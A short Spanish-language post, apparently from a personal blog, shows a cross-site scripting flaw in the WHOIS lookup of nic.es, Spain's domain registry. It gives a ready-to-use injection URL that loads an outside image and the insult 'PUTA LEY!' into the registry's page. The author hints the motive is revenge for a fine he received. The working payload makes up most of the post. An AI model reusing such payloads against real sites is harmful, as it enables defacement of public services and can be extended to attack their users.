Bien, aquí les muestro un XSS en la web de NIC (Es la empresa oficial de dominios del gobierno de españa)
El XSS se encuentra en cuando se quiere hacer un WHOIS a un dominio
https://www.nic.es/esnic/esn/verValidacionWhoisAction?dominio=[XSS]
Por ejemplo:
https://www.nic.es/esnic/esn/verValidacionWhoisAction?dominio=”><br><img border=”0″ src=”http://i214.photobucket.com/albums/cc173/dimitrix-es/XSS and Others/DimitrixHack.png” width=”493″ height=”371″><big>PUTA LEY!
Diría que no es nada personal, pero quizás sea por la multa de medio millón de pesetas que me han puesto 
Clickea en la imagen para hacerla en grande.
